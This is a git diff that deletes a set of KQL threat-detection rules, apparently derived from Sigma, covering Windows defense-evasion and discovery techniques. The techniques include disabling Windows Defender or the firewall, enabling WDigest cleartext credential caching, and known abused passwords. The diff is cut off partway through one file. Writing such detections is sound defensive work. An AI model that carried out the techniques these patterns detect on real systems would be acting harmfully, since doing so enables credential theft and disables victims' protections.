index 0ce9c87e..00000000
--- a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql b/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql
deleted file mode 100644
index 4339d55a..00000000
--- a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/08/25
-// Level: high
-// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
-HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
-This is usually used with UseLogonCredential to manipulate the caching credentials.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql b/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql
deleted file mode 100644
index a594a1fb..00000000
--- a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/09/12
-// Level: high
-// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql b/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql
deleted file mode 100644
index 495f7484..00000000
--- a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-An example would be a threat actor creating a new user via the net command and providing the password inline
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql b/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql
deleted file mode 100644
index fa5bb1a0..00000000
--- a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects Windows executables that write files with suspicious extensions
-// Tags: attack.defense_evasion, attack.t1036
-DeviceFileEvents
-| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat")))))
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql b/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql
deleted file mode 100644
index 0aebc2e2..00000000
--- a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/07
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql b/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql
deleted file mode 100644
index 00caa0ec..00000000
--- a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/07/06
-// Level: medium
-// Description: Detects the Setting of Windows Defender Exclusions
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql b/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql
deleted file mode 100644
index 4734ecfb..00000000
--- a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
-// Date: 2022/08/01
-// Level: high
-// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql b/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql
deleted file mode 100644
index 0cc30a00..00000000
--- a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects attempts to disable the Windows Firewall using PowerShell
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql b/Defense Evasion/Windows_Kernel_Debugger_Execution.kql
deleted file mode 100644
index 1742c500..00000000
--- a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql b/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql
deleted file mode 100644
index 7905e6de..00000000
--- a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: vburov
-// Date: 2019/02/23
-// Level: low
-// Description: Detect suspicious parent processes of well-known Windows processes
-// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "-") or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Winget_Admin_Settings_Modification.kql b/Defense Evasion/Winget_Admin_Settings_Modification.kql
deleted file mode 100644
index 4043350a..00000000
--- a/Defense Evasion/Winget_Admin_Settings_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A"
\ No newline at end of file
diff --git a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql b/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql
deleted file mode 100644
index 9143ea08..00000000
--- a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql b/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql
deleted file mode 100644
index 5675cce0..00000000
--- a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, manasmbellani
-// Date: 2022/02/16
-// Level: medium
-// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
-This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or ((((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m ") and (ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u ")) and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql b/Defense Evasion/Write_Protect_For_Storage_Disabled.kql
deleted file mode 100644
index d0e57787..00000000
--- a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2021/06/11
-// Level: medium
-// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
-This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
deleted file mode 100644
index ec001999..00000000
--- a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
deleted file mode 100644
index bd2befa9..00000000
--- a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql b/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql
deleted file mode 100644
index 206710d7..00000000
--- a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
-Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
-
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql b/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql
deleted file mode 100644
index b29fa211..00000000
--- a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/09/20
-// Level: high
-// Description: Detects the execution of Xwizard tool from a non-default directory.
-When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
-
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
deleted file mode 100644
index f4819e7d..00000000
--- a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Discovery/Advanced_IP_Scanner_-_File_Event.kql b/Discovery/Advanced_IP_Scanner_-_File_Event.kql
deleted file mode 100644
index f1a91211..00000000
--- a/Discovery/Advanced_IP_Scanner_-_File_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ROxPinTeddy
-// Date: 2020/05/12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// Tags: attack.discovery, attack.t1046
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
diff --git a/Discovery/BloodHound_Collection_Files.kql b/Discovery/BloodHound_Collection_Files.kql
deleted file mode 100644
index 2dd9a6ed..00000000
--- a/Discovery/BloodHound_Collection_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: C.J. May
-// Date: 2022/08/09
-// Level: high
-// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-DeviceFileEvents
-| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql b/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql
deleted file mode 100644
index d04369ff..00000000
--- a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 3aa4acf8..00000000
--- a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/08
-// Level: medium
-// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
-// Tags: attack.discovery, attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql b/Discovery/Console_CodePage_Lookup_Via_CHCP.kql
deleted file mode 100644
index 7179f355..00000000
--- a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/02/21
-// Level: medium
-// Description: Detects use of chcp to look up the system locale value as part of host discovery
-// Tags: attack.discovery, attack.t1614.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Discovery/Detected_Windows_Software_Discovery.kql b/Discovery/Detected_Windows_Software_Discovery.kql
deleted file mode 100644
index 76f1939d..00000000
--- a/Discovery/Detected_Windows_Software_Discovery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/16
-// Level: medium
-// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
-// Tags: attack.discovery, attack.t1518
-DeviceProcessEvents
-| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Discovery/DirLister_Execution.kql b/Discovery/DirLister_Execution.kql
deleted file mode 100644
index d5da06cb..00000000
--- a/Discovery/DirLister_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: low
-// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
-// Tags: attack.discovery, attack.t1083
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe"
\ No newline at end of file
diff --git a/Discovery/Discovery_of_a_System_Time.kql b/Discovery/Discovery_of_a_System_Time.kql
deleted file mode 100644
index c46edd34..00000000
--- a/Discovery/Discovery_of_a_System_Time.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: low
-// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
-// Tags: attack.discovery, attack.t1124
-DeviceProcessEvents
-| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe")
\ No newline at end of file
diff --git a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql b/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql
deleted file mode 100644
index b4f3e67d..00000000
--- a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects execution of "dsquery.exe" for domain trust discovery
-// Tags: attack.discovery, attack.t1482
-DeviceProcessEvents
-| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/Discovery/DriverQuery.EXE_Execution.kql b/Discovery/DriverQuery.EXE_Execution.kql
deleted file mode 100644
index 3320ae10..00000000
--- a/Discovery/DriverQuery.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
